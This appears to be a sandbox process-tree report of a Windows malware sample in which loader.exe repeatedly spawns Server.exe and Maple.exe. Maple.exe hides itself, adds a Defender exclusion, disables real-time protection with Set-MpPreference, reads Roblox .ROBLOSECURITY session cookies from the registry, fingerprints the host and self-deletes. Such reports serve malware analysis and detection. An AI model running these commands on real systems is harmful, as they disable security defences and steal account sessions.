C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY17⤵PID:3172
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption17⤵PID:2524
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory17⤵PID:5008
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid17⤵PID:3440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER17⤵PID:3008
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name17⤵
- Detects videocard installed
PID:4444
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause17⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2152 -
C:\Windows\system32\PING.EXEping localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3620
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"17⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2000
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"17⤵
- Executes dropped EXE
PID:220
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"17⤵
- Checks computer location settings
- Executes dropped EXE
PID:1592 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"18⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3632
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"18⤵
- Executes dropped EXE
PID:4620
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"18⤵
- Checks computer location settings
- Executes dropped EXE
PID:1584 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"19⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3528
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"19⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2708 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid20⤵PID:2300
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"20⤵
- Views/modifies file attributes
PID:4360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'20⤵
- Command and Scripting Interpreter: PowerShell
PID:1764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 220⤵PID:4928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY20⤵
- Command and Scripting Interpreter: PowerShell
PID:4620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY20⤵PID:3844
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption20⤵PID:1156
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory20⤵PID:1244
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid20⤵PID:1764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER20⤵PID:1276
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name20⤵
- Detects videocard installed
PID:3320
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause20⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4084 -
C:\Windows\system32\PING.EXEping localhost21⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"19⤵
- Checks computer location settings
- Executes dropped EXE
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"20⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4988
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"20⤵
- Executes dropped EXE
PID:3620
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
PID:4700 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"21⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2396
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"21⤵
- Drops file in Drivers directory
PID:2124 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid22⤵PID:3920
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"22⤵
- Views/modifies file attributes
PID:784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'22⤵
- Command and Scripting Interpreter: PowerShell
PID:864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 222⤵
- Command and Scripting Interpreter: PowerShell
PID:3008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY22⤵
- Command and Scripting Interpreter: PowerShell
PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY22⤵PID:4744
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption22⤵PID:4828
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory22⤵PID:592
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid22⤵PID:3212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER22⤵
- Command and Scripting Interpreter: PowerShell
PID:3720
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name22⤵
- Detects videocard installed
PID:4380
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause22⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3240 -
C:\Windows\system32\PING.EXEping localhost23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"21⤵
- Checks computer location settings
PID:4048 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"22⤵
- System Location Discovery: System Language Discovery
PID:2472
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"22⤵PID:2992
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"22⤵
- Checks computer location settings
PID:4136 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"23⤵
- System Location Discovery: System Language Discovery
PID:4288
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"23⤵
- Drops file in Drivers directory
PID:784 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid24⤵PID:2180
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"24⤵
- Views/modifies file attributes
PID:2836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'24⤵
- Command and Scripting Interpreter: PowerShell
PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 224⤵PID:3496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY24⤵
- Command and Scripting Interpreter: PowerShell
PID:3720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY24⤵PID:1540
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption24⤵PID:3892
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory24⤵PID:3488
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid24⤵PID:2924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER24⤵PID:3632
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name24⤵
- Detects videocard installed
PID:3608
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause24⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2836 -
C:\Windows\system32\PING.EXEping localhost25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"23⤵
- Checks computer location settings
PID:3968 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"24⤵
- System Location Discovery: System Language Discovery
PID:864
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"24⤵PID:4732
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"24⤵
- Checks computer location settings
PID:4424 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"25⤵
- System Location Discovery: System Language Discovery
PID:2352
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"25⤵
- Drops file in Drivers directory
PID:780 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid26⤵PID:2552
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"26⤵
- Views/modifies file attributes
PID:4700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'26⤵
- Command and Scripting Interpreter: PowerShell
PID:3844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 226⤵
- Command and Scripting Interpreter: PowerShell
PID:3408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY26⤵
- Command and Scripting Interpreter: PowerShell
PID:4296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY26⤵PID:4424
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption26⤵PID:4516
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory26⤵PID:968
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid26⤵PID:724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER26⤵
- Command and Scripting Interpreter: PowerShell
PID:2992
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name26⤵
- Detects videocard installed
PID:2948
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause26⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3624 -
C:\Windows\system32\PING.EXEping localhost27⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"25⤵
- Checks computer location settings
PID:4044 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"26⤵
- System Location Discovery: System Language Discovery
PID:2320
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"26⤵PID:4816
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"26⤵
- Checks computer location settings
PID:3320 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"27⤵
- System Location Discovery: System Language Discovery
PID:4340
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"27⤵
- Drops file in Drivers directory
PID:1228 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid28⤵PID:1164
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"28⤵
- Views/modifies file attributes
PID:4648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'28⤵
- Command and Scripting Interpreter: PowerShell
PID:2104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 228⤵PID:2568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY28⤵
- Command and Scripting Interpreter: PowerShell
PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY28⤵PID:1496
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption28⤵PID:4120
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory28⤵PID:4780
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid28⤵PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER28⤵
- Command and Scripting Interpreter: PowerShell
PID:3196
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name28⤵
- Detects videocard installed
PID:1996
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause28⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2032 -
C:\Windows\system32\PING.EXEping localhost29⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2924
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"27⤵
- Checks computer location settings
PID:3212 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"28⤵
- System Location Discovery: System Language Discovery
PID:3620
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"28⤵PID:2092
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"28⤵
- Checks computer location settings
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"29⤵
- System Location Discovery: System Language Discovery
PID:1648
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"29⤵PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"29⤵
- Checks computer location settings
PID:2676 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"30⤵
- System Location Discovery: System Language Discovery
PID:4408
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"30⤵
- Drops file in Drivers directory
PID:4004 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid31⤵PID:4928
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"31⤵
- Views/modifies file attributes
PID:5028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'31⤵
- Command and Scripting Interpreter: PowerShell
PID:3628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 231⤵PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY31⤵
- Command and Scripting Interpreter: PowerShell
PID:4420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY31⤵PID:3620
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption31⤵PID:3484
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory31⤵PID:4980
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid31⤵PID:3064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER31⤵PID:4348
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name31⤵
- Detects videocard installed
PID:3464
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause31⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3948 -
C:\Windows\system32\PING.EXEping localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4920
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"30⤵
- Checks computer location settings
PID:3968 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"31⤵
- System Location Discovery: System Language Discovery
PID:1212
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"31⤵PID:2356
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"31⤵
- Checks computer location settings
PID:4136 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"32⤵
- System Location Discovery: System Language Discovery
PID:2844
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"32⤵
- Drops file in Drivers directory
PID:1164 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid33⤵PID:5028
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"33⤵
- Views/modifies file attributes
PID:3440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'33⤵
- Command and Scripting Interpreter: PowerShell
PID:3676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 233⤵
- Command and Scripting Interpreter: PowerShell
PID:3940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY33⤵
- Command and Scripting Interpreter: PowerShell
PID:2428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY33⤵PID:4648
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption33⤵PID:2396
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory33⤵PID:3844
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid33⤵PID:3408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER33⤵
- Command and Scripting Interpreter: PowerShell
PID:2976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name33⤵
- Detects videocard installed
PID:2212
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause33⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2924 -
C:\Windows\system32\PING.EXEping localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4700
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"32⤵
- Checks computer location settings
PID:2456 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"33⤵
- System Location Discovery: System Language Discovery
PID:820
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"33⤵PID:4864
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"33⤵
- Checks computer location settings
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"34⤵
- System Location Discovery: System Language Discovery
PID:3484
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"34⤵PID:2320
-
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"34⤵
- Checks computer location settings
PID:3044 -
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"35⤵
- System Location Discovery: System Language Discovery
PID:2568
-
-
C:\Users\Admin\AppData\Local\Temp\Maple.exe"C:\Users\Admin\AppData\Local\Temp\Maple.exe"35⤵
- Drops file in Drivers directory
PID:3440 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid36⤵PID:5020
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"36⤵
- Views/modifies file attributes
PID:4828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'36⤵
- Command and Scripting Interpreter: PowerShell
PID:3752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 236⤵
- Command and Scripting Interpreter: PowerShell
PID:1668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY36⤵
- Command and Scripting Interpreter: PowerShell
PID:3464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY36⤵PID:5008
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption36⤵PID:2344
-
-
